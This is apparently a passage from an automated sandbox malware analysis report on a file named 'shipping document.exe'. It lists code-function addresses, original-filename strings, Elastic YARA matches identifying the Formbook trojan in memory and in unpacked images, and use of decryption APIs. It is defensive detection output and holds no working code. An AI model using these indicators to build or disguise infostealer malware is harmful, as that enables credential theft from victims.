              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018301AA2_2_018301AA
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018281CC2_2_018281CC
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017601002_2_01760100
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180A1182_2_0180A118
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018020002_2_01802000
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018303E62_2_018303E6
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177E3F02_2_0177E3F0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182A3522_2_0182A352
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F02C02_2_017F02C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018102742_2_01810274
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018305912_2_01830591
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017705352_2_01770535
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0181E4F62_2_0181E4F6
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018144202_2_01814420
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018224462_2_01822446
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017707702_2_01770770
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017947502_2_01794750
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176C7C02_2_0176C7C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178C6E02_2_0178C6E0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017869622_2_01786962
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0183A9A62_2_0183A9A6
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A02_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017728402_2_01772840
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177A8402_2_0177A840
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179E8F02_2_0179E8F0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017568B82_2_017568B8
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01826BD72_2_01826BD7
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182AB402_2_0182AB40
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176EA802_2_0176EA80
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177AD002_2_0177AD00
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176ADE02_2_0176ADE0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180CD1F2_2_0180CD1F
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01788DBF2_2_01788DBF
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01810CB52_2_01810CB5
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770C002_2_01770C00
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01760CF22_2_01760CF2
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E4F402_2_017E4F40
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01790F302_2_01790F30
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017B2F282_2_017B2F28
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01812F302_2_01812F30
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01762FC82_2_01762FC8
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EEFA02_2_017EEFA0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182CE932_2_0182CE93
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770E592_2_01770E59
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182EEDB2_2_0182EEDB
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182EE262_2_0182EE26
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01782E902_2_01782E90
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175F1722_2_0175F172
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A516C2_2_017A516C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177B1B02_2_0177B1B0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0183B16B2_2_0183B16B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0181F0CC2_2_0181F0CC
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182F0E02_2_0182F0E0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018270E92_2_018270E9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017770C02_2_017770C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175D34C2_2_0175D34C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182132D2_2_0182132D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017B739A2_2_017B739A
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018112ED2_2_018112ED
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178D2F02_2_0178D2F0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178B2C02_2_0178B2C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017752A02_2_017752A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180D5B02_2_0180D5B0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018395C32_2_018395C3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018275712_2_01827571
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017614602_2_01761460
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182F43F2_2_0182F43F
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182F7B02_2_0182F7B0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017B56302_2_017B5630
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018216CC2_2_018216CC
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017799502_2_01779950
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178B9502_2_0178B950
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018059102_2_01805910
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DD8002_2_017DD800
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017738E02_2_017738E0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017ADBF92_2_017ADBF9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E5BF02_2_017E5BF0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182FB762_2_0182FB76
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178FB802_2_0178FB80
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E3A6C2_2_017E3A6C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01811AA32_2_01811AA3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180DAAC2_2_0180DAAC
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0181DAC62_2_0181DAC6
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01827A462_2_01827A46
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182FA492_2_0182FA49
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017B5AA02_2_017B5AA0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01773D402_2_01773D40
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178FDC02_2_0178FDC0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01821D5A2_2_01821D5A
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01827D732_2_01827D73
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E9C322_2_017E9C32
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182FCF22_2_0182FCF2
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182FFB12_2_0182FFB1
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182FF092_2_0182FF09
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01733FD22_2_01733FD2
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01733FD52_2_01733FD5
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01771F922_2_01771F92
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01779EB02_2_01779EB0
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B0E0266_2_03B0E026
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B048FA6_2_03B048FA
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B0E0796_2_03B0E079
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B2D7896_2_03B2D789
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B0FFF96_2_03B0FFF9
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B167336_2_03B16733
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B167796_2_03B16779
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B0FDD06_2_03B0FDD0
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B0FDD96_2_03B0FDD9
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0495E4F67_2_0495E4F6
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049544207_2_04954420
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049624467_2_04962446
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049705917_2_04970591
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B05357_2_048B0535
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048CC6E07_2_048CC6E0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048AC7C07_2_048AC7C0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048D47507_2_048D4750
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B07707_2_048B0770
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049420007_2_04942000
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049641A27_2_049641A2
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049701AA7_2_049701AA
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049681CC7_2_049681CC
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048A01007_2_048A0100
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0494A1187_2_0494A118
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049381587_2_04938158
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049302C07_2_049302C0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049502747_2_04950274
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049703E67_2_049703E6
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048BE3F07_2_048BE3F0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496A3527_2_0496A352
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04950CB57_2_04950CB5
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048A0CF27_2_048A0CF2
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B0C007_2_048B0C00
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048C8DBF7_2_048C8DBF
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048AADE07_2_048AADE0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048BAD007_2_048BAD00
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0494CD1F7_2_0494CD1F
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496CE937_2_0496CE93
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048C2E907_2_048C2E90
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496EEDB7_2_0496EEDB
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496EE267_2_0496EE26
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B0E597_2_048B0E59
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0492EFA07_2_0492EFA0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048A2FC87_2_048A2FC8
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04952F307_2_04952F30
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048F2F287_2_048F2F28
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048D0F307_2_048D0F30
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04924F407_2_04924F40
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048968B87_2_048968B8
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048DE8F07_2_048DE8F0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048BA8407_2_048BA840
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B28407_2_048B2840
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B29A07_2_048B29A0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0497A9A67_2_0497A9A6
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048C69627_2_048C6962
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048AEA807_2_048AEA80
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04966BD77_2_04966BD7
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496AB407_2_0496AB40
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496F43F7_2_0496F43F
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048A14607_2_048A1460
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0494D5B07_2_0494D5B0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049795C37_2_049795C3
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049675717_2_04967571
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049616CC7_2_049616CC
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048F56307_2_048F5630
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496F7B07_2_0496F7B0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B70C07_2_048B70C0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0495F0CC7_2_0495F0CC
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496F0E07_2_0496F0E0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049670E97_2_049670E9
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048BB1B07_2_048BB1B0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048E516C7_2_048E516C
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0489F1727_2_0489F172
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0497B16B7_2_0497B16B
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B52A07_2_048B52A0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048CB2C07_2_048CB2C0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049512ED7_2_049512ED
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048CD2F07_2_048CD2F0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048F739A7_2_048F739A
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496132D7_2_0496132D
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0489D34C7_2_0489D34C
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496FCF27_2_0496FCF2
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04929C327_2_04929C32
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048CFDC07_2_048CFDC0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B3D407_2_048B3D40
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04961D5A7_2_04961D5A
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04967D737_2_04967D73
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B9EB07_2_048B9EB0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B1F927_2_048B1F92
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496FFB17_2_0496FFB1
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04873FD57_2_04873FD5
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04873FD27_2_04873FD2
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496FF097_2_0496FF09
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B38E07_2_048B38E0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0491D8007_2_0491D800
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049459107_2_04945910
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048B99507_2_048B9950
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048CB9507_2_048CB950
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048F5AA07_2_048F5AA0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04951AA37_2_04951AA3
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0494DAAC7_2_0494DAAC
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0495DAC67_2_0495DAC6
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04967A467_2_04967A46
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496FA497_2_0496FA49
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04923A6C7_2_04923A6C
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048CFB807_2_048CFB80
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04925BF07_2_04925BF0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048EDBF97_2_048EDBF9
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496FB767_2_0496FB76
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027A14407_2_027A1440
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0279C6007_2_0279C600
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0279C5F77_2_0279C5F7
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0279C8207_2_0279C820
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0279A8A07_2_0279A8A0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027A2F5A7_2_027A2F5A
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027A2FA07_2_027A2FA0
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027911217_2_02791121
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027B9FB07_2_027B9FB0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: String function: 0175B970 appears 262 times
              Source: C:\Users\user\Desktop\shipping document.exeCode function: String function: 017B7E54 appears 107 times
              Source: C:\Users\user\Desktop\shipping document.exeCode function: String function: 017DEA12 appears 86 times
              Source: C:\Users\user\Desktop\shipping document.exeCode function: String function: 017EF290 appears 103 times
              Source: C:\Users\user\Desktop\shipping document.exeCode function: String function: 017A5130 appears 58 times
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 0489B970 appears 262 times
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 048F7E54 appears 107 times
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 0492F290 appears 103 times
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 0491EA12 appears 86 times
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 048E5130 appears 58 times
              Source: shipping document.exe, 00000000.00000000.1653959453.0000000001004000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTrlj.exe: vs shipping document.exe
              Source: shipping document.exe, 00000000.00000002.1683528991.000000000A640000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs shipping document.exe
              Source: shipping document.exe, 00000000.00000002.1675172411.00000000014DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs shipping document.exe
              Source: shipping document.exe, 00000002.00000002.2033082089.00000000011D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameopnfiles.exej% vs shipping document.exe
              Source: shipping document.exe, 00000002.00000002.2033082089.00000000011FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameopnfiles.exej% vs shipping document.exe
              Source: shipping document.exe, 00000002.00000002.2033450578.000000000185D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs shipping document.exe
              Source: shipping document.exeBinary or memory string: OriginalFilenameTrlj.exe: vs shipping document.exe
              Source: shipping document.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 2.2.shipping document.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 2.2.shipping document.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000002.4113195669.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000002.00000002.2034898129.0000000002530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000007.00000002.4110925188.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000002.00000002.2034731642.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: shipping document.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.shipping document.exe.43a9970.2.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.shipping document.exe.43a9970.2.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.shipping document.exe.5ad0000.5.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
